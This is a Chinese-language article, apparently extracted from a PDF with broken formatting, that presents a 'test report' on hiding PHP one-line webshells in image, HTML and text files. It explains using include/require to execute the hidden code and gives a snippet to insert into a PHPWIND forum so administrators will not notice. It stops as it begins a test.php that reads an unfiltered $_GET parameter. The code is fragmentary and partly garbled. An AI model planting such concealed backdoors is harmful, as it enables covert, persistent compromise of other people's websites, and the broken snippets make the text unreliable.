PHP 后门的隐藏技巧测试报告

最近很多朋友都在问我是否能把我那一句话木马隐藏到

HTML 或图片里，其实把一句

话木马插入到

PHP

 

文件中就已经很隐蔽了，如果说硬是要放到

HTML 文件或图片里，就

接着往下看这篇的篇测试报告吧。要知道如果光把

PHP 语句放到图片里是无论如何也不能

执行的，因为

PHP 只解析扩展名为 php 的文件。所以说要能使隐藏在图片里的 PHP 语句执

行。我们就的借助

PHP

 

中的调用函数 ：

include 、require 等。

　 　 我 们 还 记 得 前 些 日 子 把 木 马 隐 藏 到 图 片 的 文 章 吧 。 也 就 是 在

PHP 文 件 里 用

include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP 中语句也类似。看

似非常隐蔽但直接调用图片对稍微懂点

PHP 的人就不难发现可疑之处。由于 URL 

里用

GET 方式很难传递参数，这就使得插入木马的性能得不到发挥。

　　

Include 函数在 PHP 中使用的比较频繁，所以引起的安全问题也实在太多，例如

PHPWIND1.36 的漏洞就是因为 include 后面的变量没做过滤引起的。由此我们就

可以构造类似的语句来插入到

PHP 文件中。然后把木马隐藏到图片或 HTML 文件里，

可以说隐蔽性就更高了。如在

PHPWIND

‘’

论坛里插入下面的语句：＜

?@include 

includ/.$PHPWIND_ROOT;?   

＞ 一般管理员是无法看出来的。

　　有了

include 函数来辅助帮忙我们就可以把 PHP

 

 

木马隐藏到 诸如

txt、html 和图片文

件等很多类型的文件里来了。因为

txt、html 和图片文件这三种类型的文件最无论在

论坛还是文章系统里是最为常见的了，下面我们就依次来做测试。

　　首先建立一

PHP 文件 test.php 文件内容为:

　　

$test=$_GET['test'];